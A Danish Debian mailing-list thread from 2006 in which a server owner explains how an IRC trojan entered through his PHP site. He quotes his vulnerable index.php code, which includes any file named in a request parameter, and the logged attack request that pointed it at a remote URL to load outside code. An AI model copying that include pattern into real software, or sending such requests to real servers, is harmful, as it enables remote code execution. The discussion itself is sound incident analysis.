Re: SV: Trojan attack mod min server
Min index.php var kodet til at lave PHP include af den fil der angives i
reqfile:
if ($_REQUEST['reqfile']<>"") {
include $_REQUEST['reqfile'];
exit;
}
Mit gæt er at nogen via dette har kunne udføre noget kode i PHP fra
291.133.46.212, normalt ville reqfile indeholde navnet på en fil på egen
min server, men nogen har været kreativ og fodret den med en http adresse.
GET /%7Etsj/fun/index.php?reqfile=http://219.133.46.212/admin/html/bar?
Mvh
Torben
> Efter at have læst på din side, er jeg ret nysgerrig I, hvad du har haft
> liggende I din index.php som har gjort, at han kunne downloade og
> eksekvere
> den fil der angives?
>
>
> Med venlig hilsen
> Andreas Krüger
>
> -----Oprindelig meddelelse-----
> Fra: Torben Schou Jensen [mailto:tsj@swampthing.dk]
> Sendt: 17. maj 2006 20:18
> Til: debian-user-danish@lists.debian.org
> Emne: Trojan attack mod min server
>
> Mandag aften opdager jeg tilfældigt via ntop en IP adresse der er fast
> koblet op på min server, og det er ikke HTTP trafik, men mystisk stabil
> trafik i små pakker mod port 2343.
>
> Ved nærmere undersøgelse viser det sig at være en såkaldt IRC trojan der i
> slutningen af december 2005 er sluppet ind på min server via et PHP hul og
> har bidt sig fast i crontab.
>
> Læs mere på http://swampthing.dk/attack1/
>
> PHP hullet er nu lukket og trojan er fjernet, men jeg tænker nu over hvad
> det hul kan have været brugt til, kan nemlig ikke finde ret meget info om
> sådan noget på google???
>
> Mvh
> Torben
>
>
>
> --
> To UNSUBSCRIBE, email to debian-user-danish-REQUEST@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact
> listmaster@lists.debian.org
>
>
--
Torben Schou Jensen
Swamp Thing
Homepage: http://swampthing.dk/~tsj/
Reply to: